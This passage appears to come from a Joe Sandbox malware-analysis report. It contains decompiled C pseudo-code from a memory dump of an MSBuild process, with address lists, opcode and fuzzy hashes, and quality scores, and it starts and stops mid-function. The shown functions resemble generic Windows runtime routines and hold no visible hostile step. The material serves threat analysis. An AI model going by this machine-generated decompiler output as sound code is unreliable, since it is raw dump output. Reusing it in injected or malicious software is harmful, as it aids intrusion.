                                            						 *_t47 =  *_t47 - 1;
                                            						if( *_t47 != 0) {
                                            							goto L8;
                                            						}
                                            						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                                            							L10:
                                            							_push(3);
                                            							asm("int 0x29");
                                            						} else {
                                            							_t48 =  *((intOrPtr*)(_t53 + 4));
                                            							if( *_t48 != _t53) {
                                            								goto L10;
                                            							} else {
                                            								 *_t48 = _t64;
                                            								_t61 =  &_v36;
                                            								 *((intOrPtr*)(_t64 + 4)) = _t48;
                                            								_t49 = _v32;
                                            								if( *_t49 != _t61) {
                                            									goto L10;
                                            								} else {
                                            									 *_t53 = _t61;
                                            									 *((intOrPtr*)(_t53 + 4)) = _t49;
                                            									 *_t49 = _t53;
                                            									_v32 = _t53;
                                            									goto L8;
                                            								}
                                            							}
                                            						}
                                            						L11:
                                            						_t51 = _v29;
                                            						goto L12;
                                            						L8:
                                            						if(_t64 != 0x10f5768) {
                                            							_t67 = _v20;
                                            							continue;
                                            						}
                                            						goto L11;
                                            					}
                                            				}
                                            				L12:
                                            				E0101FFB0(_t51, _t64, 0x10f8a6c);
                                            				while(1) {
                                            					_t37 = _v28;
                                            					_t55 =  &_v28;
                                            					if(_t37 == _t55) {
                                            						break;
                                            					}
                                            					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                                            						goto L10;
                                            					} else {
                                            						_t59 =  *_t37;
                                            						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                                            							goto L10;
                                            						} else {
                                            							_t62 =  &_v28;
                                            							_v28 = _t59;
                                            							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                                            							continue;
                                            						}
                                            					}
                                            					L18:
                                            				}
                                            				_pop(_t65);
                                            				_pop(_t68);
                                            				_pop(_t52);
                                            				return E0104B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                                            				goto L18;
                                            			}

































                                            0x010b3d40
                                            0x010b3d48
                                            0x010b3d52
                                            0x010b3d59
                                            0x010b3d5d
                                            0x010b3d61
                                            0x010b3d63
                                            0x010b3d67
                                            0x010b3d69
                                            0x010b3d72
                                            0x010b3d76
                                            0x010b3d7a
                                            0x010b3d7f
                                            0x010b3d8b
                                            0x010b3d91
                                            0x010b3d91
                                            0x010b3d91
                                            0x010b3d94
                                            0x010b3d96
                                            0x010b3d9d
                                            0x010b3da1
                                            0x010b3db0
                                            0x010b3dba
                                            0x010b3dbc
                                            0x010b3dbc
                                            0x010b3dc6
                                            0x010b3dcb
                                            0x010b3dcf
                                            0x010b3dd1
                                            0x010b3dd4
                                            0x00000000
                                            0x00000000
                                            0x010b3dd9
                                            0x010b3e0c
                                            0x010b3e0c
                                            0x010b3e0f
                                            0x010b3ddb
                                            0x010b3ddb
                                            0x010b3de0
                                            0x00000000
                                            0x010b3de2
                                            0x010b3de2
                                            0x010b3de4
                                            0x010b3de8
                                            0x010b3deb
                                            0x010b3df1
                                            0x00000000
                                            0x010b3df3
                                            0x010b3df3
                                            0x010b3df5
                                            0x010b3df8
                                            0x010b3dfa
                                            0x00000000
                                            0x010b3dfa
                                            0x010b3df1
                                            0x010b3de0
                                            0x010b3e11
                                            0x010b3e11
                                            0x00000000
                                            0x010b3dfe
                                            0x010b3e04
                                            0x010b3e06
                                            0x00000000
                                            0x010b3e06
                                            0x00000000
                                            0x010b3e04
                                            0x010b3d91
                                            0x010b3e15
                                            0x010b3e1a
                                            0x010b3e1f
                                            0x010b3e1f
                                            0x010b3e23
                                            0x010b3e29
                                            0x00000000
                                            0x00000000
                                            0x010b3e2e
                                            0x00000000
                                            0x010b3e30
                                            0x010b3e30
                                            0x010b3e35
                                            0x00000000
                                            0x010b3e37
                                            0x010b3e3e
                                            0x010b3e42
                                            0x010b3e48
                                            0x010b3e4e
                                            0x00000000
                                            0x010b3e4e
                                            0x010b3e35
                                            0x00000000
                                            0x010b3e2e
                                            0x010b3e5b
                                            0x010b3e5c
                                            0x010b3e5d
                                            0x010b3e68
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45546bd76357e0e2ac65d4030d3d16515367ac3f41c726b0bc738c9347e85b22
                                            • Instruction ID: c1e7bdc3b7d172bb7c9e26a48c5b0fa7296f1cf653a4fc2ac31b5fe32ff47412
                                            • Opcode Fuzzy Hash: 45546bd76357e0e2ac65d4030d3d16515367ac3f41c726b0bc738c9347e85b22
                                            • Instruction Fuzzy Hash: 74317971509302DFC714DF18D58299ABBE1FF85704F1989AEE5D89F681D730E908CBA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E0103A70E(intOrPtr* __ecx, char* __edx) {
                                            				unsigned int _v8;
                                            				intOrPtr* _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t16;
                                            				intOrPtr _t17;
                                            				intOrPtr _t28;
                                            				char* _t33;
                                            				intOrPtr _t37;
                                            				intOrPtr _t38;
                                            				void* _t50;
                                            				intOrPtr _t52;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t52 =  *0x10f7b10; // 0x0
                                            				_t33 = __edx;
                                            				_t48 = __ecx;
                                            				_v12 = __ecx;
                                            				if(_t52 == 0) {
                                            					 *0x10f7b10 = 8;
                                            					 *0x10f7b14 = 0x10f7b0c;
                                            					 *0x10f7b18 = 1;
                                            					L6:
                                            					_t2 = _t52 + 1; // 0x1
                                            					E0103A990(0x10f7b10, _t2, 7);
                                            					asm("bts ecx, eax");
                                            					 *_t48 = _t52;
                                            					 *_t33 = 1;
                                            					L3:
                                            					_t16 = 0;
                                            					L4:
                                            					return _t16;
                                            				}
                                            				_t17 = L0103A840(__edx, __ecx, __ecx, _t52, 0x10f7b10, 1, 0);
                                            				if(_t17 == 0xffffffff) {
                                            					_t37 =  *0x10f7b10; // 0x0
                                            					_t3 = _t37 + 0x27; // 0x27
                                            					__eflags = _t3 >> 5 -  *0x10f7b18; // 0x0
                                            					if(__eflags > 0) {
                                            						_t38 =  *0x10f7b9c; // 0x0
                                            						_t4 = _t52 + 0x27; // 0x27
                                            						_v8 = _t4 >> 5;
                                            						_t50 = L01024620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                            						__eflags = _t50;
                                            						if(_t50 == 0) {
                                            							_t16 = 0xc0000017;
                                            							goto L4;
                                            						}
                                            						 *0x10f7b18 = _v8;
                                            						_t8 = _t52 + 7; // 0x7
                                            						E0104F3E0(_t50,  *0x10f7b14, _t8 >> 3);
                                            						_t28 =  *0x10f7b14; // 0x0
                                            						__eflags = _t28 - 0x10f7b0c;
                                            						if(_t28 != 0x10f7b0c) {
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                            						}
                                            						_t9 = _t52 + 8; // 0x8
                                            						 *0x10f7b14 = _t50;
                                            						_t48 = _v12;
                                            						 *0x10f7b10 = _t9;
                                            						goto L6;
                                            					}
                                            					 *0x10f7b10 = _t37 + 8;
                                            					goto L6;
                                            				}
                                            				 *__ecx = _t17;
                                            				 *_t33 = 0;
                                            				goto L3;
                                            			}
















                                            0x0103a713
                                            0x0103a714
                                            0x0103a717
                                            0x0103a71d
                                            0x0103a720
                                            0x0103a722
                                            0x0103a727
                                            0x0103a74a
                                            0x0103a754
                                            0x0103a75e
                                            0x0103a768
                                            0x0103a76a
                                            0x0103a773
                                            0x0103a78b
                                            0x0103a790
                                            0x0103a792
                                            0x0103a741
                                            0x0103a741
                                            0x0103a743
                                            0x0103a749
                                            0x0103a749
                                            0x0103a732
                                            0x0103a73a
                                            0x0103a797
                                            0x0103a79d
                                            0x0103a7a3
                                            0x0103a7a9
                                            0x0103a7b6
                                            0x0103a7bc
                                            0x0103a7ca
                                            0x0103a7e0
                                            0x0103a7e2
                                            0x0103a7e4
                                            0x01079bf2
                                            0x00000000
                                            0x01079bf2
                                            0x0103a7ed
                                            0x0103a7f2
                                            0x0103a800
                                            0x0103a805
                                            0x0103a80d
                                            0x0103a812
                                            0x01079c08
                                            0x01079c08
                                            0x0103a818
                                            0x0103a81b
                                            0x0103a821
                                            0x0103a824
                                            0x00000000
                                            0x0103a824
                                            0x0103a7ae
                                            0x00000000
                                            0x0103a7ae
                                            0x0103a73c
                                            0x0103a73e
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4bb189fb9938f82003fdae1c1e44ed8e9500800d58f3dcdee92f2557dc15cc8
                                            • Instruction ID: f66a93cc4a8262c18800196715854f58a17fd5f13a178bd620c67ee10d94121d
                                            • Opcode Fuzzy Hash: a4bb189fb9938f82003fdae1c1e44ed8e9500800d58f3dcdee92f2557dc15cc8
                                            • Instruction Fuzzy Hash: 4631C1B1700209DBC721CB08DCA2F6A7BF9FB86710F54095EE2C5C7A44D3BA9901CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E010361A0(signed int* __ecx) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				intOrPtr* _v16;
                                            				intOrPtr _v20;
                                            				intOrPtr _t30;
                                            				intOrPtr _t31;
                                            				void* _t32;
                                            				intOrPtr _t33;
                                            				intOrPtr _t37;
                                            				intOrPtr _t49;
                                            				signed int _t51;
                                            				intOrPtr _t52;
                                            				signed int _t54;
                                            				void* _t59;
                                            				signed int* _t61;
                                            				intOrPtr* _t64;
                                            
                                            				_t61 = __ecx;
                                            				_v12 = 0;
                                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                            				_v16 = __ecx;
                                            				_v8 = 0;
                                            				if(_t30 == 0) {
                                            					L6:
                                            					_t31 = 0;
                                            					L7:
                                            					return _t31;
                                            				}
                                            				_t32 = _t30 + 0x5d8;
                                            				if(_t32 == 0) {
                                            					goto L6;
                                            				}
                                            				_t59 = _t32 + 0x30;
                                            				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                            					goto L6;
                                            				}
                                            				if(__ecx != 0) {
                                            					 *((intOrPtr*)(__ecx)) = 0;
                                            					 *((intOrPtr*)(__ecx + 4)) = 0;
                                            				}
                                            				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                            					_t51 =  *(_t32 + 0x10);
                                            					_t33 = _t32 + 0x10;
                                            					_v20 = _t33;
                                            					_t54 =  *(_t33 + 4);
                                            					if((_t51 | _t54) == 0) {
                                            						_t37 = E01035E50(0xfe67cc, 0, 0,  &_v12);
                                            						if(_t37 != 0) {
                                            							goto L6;
                                            						}
                                            						_t52 = _v8;
                                            						asm("lock cmpxchg8b [esi]");
                                            						_t64 = _v16;
                                            						_t49 = _t37;
                                            						_v20 = 0;
                                            						if(_t37 == 0) {
                                            							if(_t64 != 0) {
                                            								 *_t64 = _v12;
                                            								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                            							}
                                            							E010D9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                            							_t31 = 1;
                                            							goto L7;
                                            						}
                                            						E0100F7C0(_t52, _v12, _t52, 0);
                                            						if(_t64 != 0) {
                                            							 *_t64 = _t49;
                                            							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                            						}
                                            						L12:
                                            						_t31 = 1;
                                            						goto L7;
                                            					}
                                            					if(_t61 != 0) {
                                            						 *_t61 = _t51;
                                            						_t61[1] = _t54;
                                            					}
                                            					goto L12;
                                            				} else {
                                            					goto L6;
                                            				}
                                            			}



















                                            0x010361b3
                                            0x010361b5
                                            0x010361bd
                                            0x010361c3
                                            0x010361c7
                                            0x010361d2
                                            0x010361ff
                                            0x010361ff
                                            0x01036201
                                            0x01036207
                                            0x01036207
                                            0x010361d4
                                            0x010361d9
                                            0x00000000
                                            0x00000000
                                            0x010361df
                                            0x010361e2
                                            0x00000000
                                            0x00000000
                                            0x010361e6
                                            0x010361e8
                                            0x010361ee
                                            0x010361ee
                                            0x010361f9
                                            0x0107762f
                                            0x01077632
                                            0x01077635
                                            0x01077639
                                            0x01077640
                                            0x0107766e
                                            0x01077675
                                            0x00000000
                                            0x00000000
                                            0x01077681
                                            0x01077689
                                            0x0107768d
                                            0x01077691
                                            0x01077695
                                            0x01077699
                                            0x010776af
                                            0x010776b5
                                            0x010776b7
                                            0x010776b7
                                            0x010776d7
                                            0x010776dc
                                            0x00000000
                                            0x010776dc
                                            0x010776a2
                                            0x010776a9
                                            0x01077651
                                            0x01077653
                                            0x01077653
                                            0x01077656
                                            0x01077656
                                            0x00000000
                                            0x01077656
                                            0x01077644
                                            0x01077646
                                            0x01077648
                                            0x01077648
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 63378e6c5a66b36ed8f9bae72735346a9fbfb66e98d9fccb330bb52f07fca98d
                                            • Instruction ID: 47567a8aa1a3af1222105923822657a23c8afa30b23cc3a2c6316a61ddc0dffa
                                            • Opcode Fuzzy Hash: 63378e6c5a66b36ed8f9bae72735346a9fbfb66e98d9fccb330bb52f07fca98d
                                            • Instruction Fuzzy Hash: D4316B71A057019FE3A0CF1DC804B2ABBE8FB88B44F0949ADE9D89B251E771D904CB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E0100AA16(signed short* __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				signed short _v16;
                                            				intOrPtr _v20;
                                            				signed short _v24;
                                            				signed short _v28;
                                            				void* _v32;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr _t25;
                                            				signed short _t38;
                                            				signed short* _t42;
                                            				signed int _t44;
                                            				signed short* _t52;
                                            				signed short _t53;
                                            				signed int _t54;
                                            
                                            				_v8 =  *0x10fd360 ^ _t54;
                                            				_t42 = __ecx;
                                            				_t44 =  *__ecx & 0x0000ffff;
                                            				_t52 =  &(__ecx[2]);
                                            				_t51 = _t44 + 2;
                                            				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                            					L4:
                                            					_t25 =  *0x10f7b9c; // 0x0
                                            					_t53 = L01024620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                            					__eflags = _t53;
                                            					if(_t53 == 0) {
                                            						L3:
                                            						return E0104B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                            					} else {
                                            						E0104F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                            						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                            						L2:
                                            						_t51 = 4;
                                            						if(L01016C59(_t53, _t51, _t58) != 0) {
                                            							_t28 = E01035E50(0xfec338, 0, 0,  &_v32);
                                            							__eflags = _t28;
                                            							if(_t28 == 0) {
                                            								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                            								__eflags = _t38;
                                            								_v24 = _t53;
                                            								_v16 = _t38;
                                            								_v20 = 0;
                                            								_v12 = 0;
                                            								E0103B230(_v32, _v28, 0xfec2d8, 1,  &_v24);
                                            								_t28 = E0100F7A0(_v32, _v28);
                                            							}
                                            							__eflags = _t53 -  *_t52;
                                            							if(_t53 !=  *_t52) {
                                            								_t28 = L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                            							}
                                            						}
                                            						goto L3;
                                            					}
                                            				}
                                            				_t53 =  *_t52;
                                            				_t44 = _t44 >> 1;
                                            				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                            				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                            					goto L4;
                                            				}
                                            				goto L2;
                                            			}




















                                            0x0100aa25
                                            0x0100aa29
                                            0x0100aa2d
                                            0x0100aa30
                                            0x0100aa37
                                            0x0100aa3c
                                            0x01064458
                                            0x01064458
                                            0x01064472
                                            0x01064474
                                            0x01064476
                                            0x0100aa64
                                            0x0100aa74
                                            0x0106447c
                                            0x01064483
                                            0x01064492
                                            0x0100aa52
                                            0x0100aa54
                                            0x0100aa5e
                                            0x010644a8
                                            0x010644ad
                                            0x010644af
                                            0x010644b6
                                            0x010644b6
                                            0x010644b9
                                            0x010644bc
                                            0x010644cd
                                            0x010644d3
                                            0x010644d6
                                            0x010644e1
                                            0x010644e1
                                            0x010644e6
                                            0x010644e8
                                            0x010644fb
                                            0x010644fb
                                            0x010644e8
                                            0x00000000
                                            0x0100aa5e
                                            0x01064476
                                            0x0100aa42
                                            0x0100aa46
                                            0x0100aa48
                                            0x0100aa4c
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8768b10c109b7fa023fd0af8f29c965e2c1b1a437b47d247457d01c01497a7fc
                                            • Instruction ID: 74f3fe7111ee6939d69a2f54ac3e70ac7620f24bb0125cd887271e5d8bbde1af
                                            • Opcode Fuzzy Hash: 8768b10c109b7fa023fd0af8f29c965e2c1b1a437b47d247457d01c01497a7fc
                                            • Instruction Fuzzy Hash: 1A31E371A0021AEBDB159F68CD82ABFB7B8FF48700F014069F981E7180EB759951DBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E01044A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				signed int _v8;
                                            				signed int* _v12;
                                            				char _v13;
                                            				signed int _v16;
                                            				char _v21;
                                            				signed int* _v24;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed int _t29;
                                            				signed int* _t32;
                                            				signed int* _t41;
                                            				signed int _t42;
                                            				void* _t43;
                                            				intOrPtr* _t51;
                                            				void* _t52;
                                            				signed int _t53;
                                            				signed int _t58;
                                            				void* _t59;
                                            				signed int _t60;
                                            				signed int _t62;
                                            
                                            				_t49 = __edx;
                                            				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                            				_t26 =  *0x10fd360 ^ _t62;
                                            				_v8 =  *0x10fd360 ^ _t62;
                                            				_t41 = __ecx;
                                            				_t51 = __edx;
                                            				_v12 = __ecx;
                                            				if(_a4 == 0) {
                                            					if(_a8 != 0) {
                                            						goto L1;
                                            					}
                                            					_v13 = 1;
                                            					E01022280(_t26, 0x10f8608);
                                            					_t58 =  *_t41;
                                            					if(_t58 == 0) {
                                            						L11:
                                            						E0101FFB0(_t41, _t51, 0x10f8608);
                                            						L2:
                                            						 *0x10fb1e0(_a4, _a8);
                                            						_t42 =  *_t51();
                                            						if(_t42 == 0) {
                                            							_t29 = 0;
                                            							L5:
                                            							_pop(_t52);
                                            							_pop(_t59);
                                            							_pop(_t43);
                                            							return E0104B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                            						}
                                            						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                            						if(_v21 != 0) {
                                            							_t53 = 0;
                                            							E01022280(_t28, 0x10f8608);
                                            							_t32 = _v24;
                                            							if( *_t32 == _t58) {
                                            								 *_t32 = _t42;
                                            								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                            								if(_t58 != 0) {
                                            									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                            									asm("sbb edi, edi");
                                            									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                            								}
                                            							}
                                            							E0101FFB0(_t42, _t53, 0x10f8608);
                                            							if(_t53 != 0) {
                                            								L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                            							}
                                            						}
                                            						_t29 = _t42;
                                            						goto L5;
                                            					}
                                            					if( *((char*)(_t58 + 0x40)) != 0) {
                                            						L10:
                                            						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                            						E0101FFB0(_t41, _t51, 0x10f8608);
                                            						_t29 = _t58;
                                            						goto L5;
                                            					}
                                            					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                            					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                            						goto L11;
                                            					}
                                            					goto L10;
                                            				}
                                            				L1:
                                            				_v13 = 0;
                                            				_t58 = 0;
                                            				goto L2;
                                            			}
























                                            0x01044a2c
                                            0x01044a34
                                            0x01044a3c
                                            0x01044a3e
                                            0x01044a48
                                            0x01044a4b
                                            0x01044a4d
                                            0x01044a51
                                            0x01044a9c
                                            0x00000000
                                            0x00000000
                                            0x01044aa3
                                            0x01044aa8
                                            0x01044aad
                                            0x01044ab1
                                            0x01044ade
                                            0x01044ae3
                                            0x01044a5a
                                            0x01044a62
                                            0x01044a6a
                                            0x01044a6e
                                            0x0107f203
                                            0x01044a84
                                            0x01044a88
                                            0x01044a89
                                            0x01044a8a
                                            0x01044a95
                                            0x01044a95
                                            0x01044a79
                                            0x01044a80
                                            0x01044af2
                                            0x01044af4
                                            0x01044af9
                                            0x01044aff
                                            0x01044b01
                                            0x01044b03
                                            0x01044b08
                                            0x0107f20a
                                            0x0107f212
                                            0x0107f216
                                            0x0107f216
                                            0x01044b08
                                            0x01044b13
                                            0x01044b1a
                                            0x0107f229
                                            0x0107f229
                                            0x01044b1a
                                            0x01044a82
                                            0x00000000
                                            0x01044a82
                                            0x01044ab7
                                            0x01044acd
                                            0x01044acd
                                            0x01044ad5
                                            0x01044ada
                                            0x00000000
                                            0x01044ada
                                            0x01044ac2
                                            0x01044acb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01044acb
                                            0x01044a53
                                            0x01044a53
                                            0x01044a58
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27268867075f512a8c9d4f0d48fc29180c01336e0c18719a9ce405124ab0b1f5
                                            • Instruction ID: 3007949c9f9ad5b39c6002790713d4e0a6b941e55c0a6c343a3b15a07ac887a8
                                            • Opcode Fuzzy Hash: 27268867075f512a8c9d4f0d48fc29180c01336e0c18719a9ce405124ab0b1f5
                                            • Instruction Fuzzy Hash: EC3155722013119BD761EF58C9C1B6ABBE4FF84700F00457DE9D68B641CB70D814CB86
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E01048EC7(void* __ecx, void* __edx) {
                                            				signed int _v8;
                                            				signed int* _v16;
                                            				intOrPtr _v20;
                                            				signed int* _v24;
                                            				char* _v28;
                                            				signed int* _v32;
                                            				intOrPtr _v36;
                                            				signed int* _v40;
                                            				signed int* _v44;
                                            				signed int* _v48;
                                            				intOrPtr _v52;
                                            				signed int* _v56;
                                            				signed int* _v60;
                                            				signed int* _v64;
                                            				intOrPtr _v68;
                                            				signed int* _v72;
                                            				char* _v76;
                                            				signed int* _v80;
                                            				signed int _v84;
                                            				signed int* _v88;
                                            				intOrPtr _v92;
                                            				signed int* _v96;
                                            				intOrPtr _v100;
                                            				signed int* _v104;
                                            				signed int* _v108;
                                            				char _v140;
                                            				signed int _v144;
                                            				signed int _v148;
                                            				signed int* _v152;
                                            				char _v156;
                                            				signed int* _v160;
                                            				char _v164;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* _t67;
                                            				intOrPtr _t70;
                                            				void* _t71;
                                            				void* _t72;
                                            				signed int _t73;
                                            
                                            				_t69 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t73;
                                            				_t48 =  *[fs:0x30];
                                            				_t72 = __edx;
                                            				_t71 = __ecx;
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                            					_t48 = E01034E70(0x10f86e4, 0x1049490, 0, 0);
                                            					if( *0x10f53e8 > 5 && E01048F33(0x10f53e8, 0, 0x2000) != 0) {
                                            						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                            						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                            						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                            						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                            						_v108 =  &_v84;
                                            						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                            						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                            						_v76 =  &_v156;
                                            						_t70 = 8;
                                            						_v60 =  &_v144;
                                            						_t67 = 4;
                                            						_v44 =  &_v148;
                                            						_v152 = 0;
                                            						_v160 = 0;
                                            						_v104 = 0;
                                            						_v100 = 2;
                                            						_v96 = 0;
                                            						_v88 = 0;
                                            						_v80 = 0;
                                            						_v72 = 0;
                                            						_v68 = _t70;
                                            						_v64 = 0;
                                            						_v56 = 0;
                                            						_v52 = 0x10f53e8;
                                            						_v48 = 0;
                                            						_v40 = 0;
                                            						_v36 = 0x10f53e8;
                                            						_v32 = 0;
                                            						_v28 =  &_v164;
                                            						_v24 = 0;
                                            						_v20 = _t70;
                                            						_v16 = 0;
                                            						_t69 = 0xfebc46;
                                            						_t48 = E01087B9C(0x10f53e8, 0xfebc46, _t67, 0x10f53e8, _t70,  &_v140);
                                            					}
                                            				}
                                            				return E0104B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                            			}











































                                            0x01048ec7
                                            0x01048ed9
                                            0x01048edc
                                            0x01048ee6
                                            0x01048ee9
                                            0x01048eee
                                            0x01048efc
                                            0x01048f08
                                            0x01081349
                                            0x01081353
                                            0x0108135d
                                            0x01081366
                                            0x0108136f
                                            0x01081375
                                            0x0108137c
                                            0x01081385
                                            0x01081390
                                            0x01081391
                                            0x0108139c
                                            0x0108139d
                                            0x010813a6
                                            0x010813ac
                                            0x010813b2
                                            0x010813b5
                                            0x010813bc
                                            0x010813bf
                                            0x010813c2
                                            0x010813c5
                                            0x010813c8
                                            0x010813cb
                                            0x010813ce
                                            0x010813d1
                                            0x010813d4
                                            0x010813d7
                                            0x010813da
                                            0x010813dd
                                            0x010813e0
                                            0x010813e3
                                            0x010813e6
                                            0x010813e9
                                            0x010813f6
                                            0x01081400
                                            0x01081400
                                            0x01048f08
                                            0x01048f32

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cdf2704a1bd1e70181c5801b31ca1cdf487049fb0c763942a3094a698420bd48
                                            • Instruction ID: 63cd7bdda923ce4ec31463458ea92b28312ad7948f05b35286a00ee5f5cab24f
                                            • Opcode Fuzzy Hash: cdf2704a1bd1e70181c5801b31ca1cdf487049fb0c763942a3094a698420bd48
                                            • Instruction Fuzzy Hash: 1B4181B1D002189FDB20CFAAD981AEEFBF4FB48710F5081AEE649A7640E7755A44CF50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E0103E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                            				intOrPtr* _v0;
                                            				signed char _v4;
                                            				signed int _v8;
                                            				void* __ecx;
                                            				void* __ebp;
                                            				void* _t37;
                                            				intOrPtr _t38;
                                            				signed int _t44;
                                            				signed char _t52;
                                            				void* _t54;
                                            				intOrPtr* _t56;
                                            				void* _t58;
                                            				char* _t59;
                                            				signed int _t62;
                                            
                                            				_t58 = __edx;
                                            				_push(0);
                                            				_push(4);
                                            				_push( &_v8);
                                            				_push(0x24);
                                            				_push(0xffffffff);
                                            				if(E01049670() < 0) {
                                            					L0105DF30(_t54, _t58, _t35);
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					_push(_t54);
                                            					_t52 = _v4;
                                            					if(_t52 > 8) {
                                            						_t37 = 0xc0000078;
                                            					} else {
                                            						_t38 =  *0x10f7b9c; // 0x0
